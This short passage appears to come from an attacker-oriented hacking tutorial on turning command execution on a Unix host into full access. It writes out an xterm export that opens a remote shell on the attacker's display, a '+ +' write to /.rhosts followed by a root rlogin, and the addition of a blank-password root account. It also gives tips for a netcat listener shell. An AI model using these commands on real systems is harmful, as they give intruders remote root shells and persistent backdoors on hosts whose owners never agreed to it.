Unix

Unix
If you have found some way to execute a command on a Unix box, but there's no port 23 open - don't despair - you could try to export an xterm to your box (assuming that you are running an X-server, and you do not block incoming traffic on port 6000).
> xhost +victim
> your_exploit victim "/usr/X11R6/bin/xterm -display attacker:0.0&"
The above-mentioned command will export an xterm to your server (provided that xterm is located in /usr/X11R6/bin).
Say you want to rlogin to the host, and want to modify the relevant files to be able to rlogin to the host:
> your_exploit victim "echo + + >> /.rhosts"
> rlogin -l root victim
The possibilities are endless. You might want to add a UID 0, GID 0 user to the password file, with a blank password, then telnet and become root. Once you can execute a command on a UNIX host there should be no reason to be able to compromise the host.
We are assuming that the command is executed with "root" rights. If this is not the case, things can get slightly more difficult. Keep in mind that normal users cannot have processes that listens on ports lower than 1024. If you plan to get a shell spawning netcat make sure it listens on a port higher than 1024.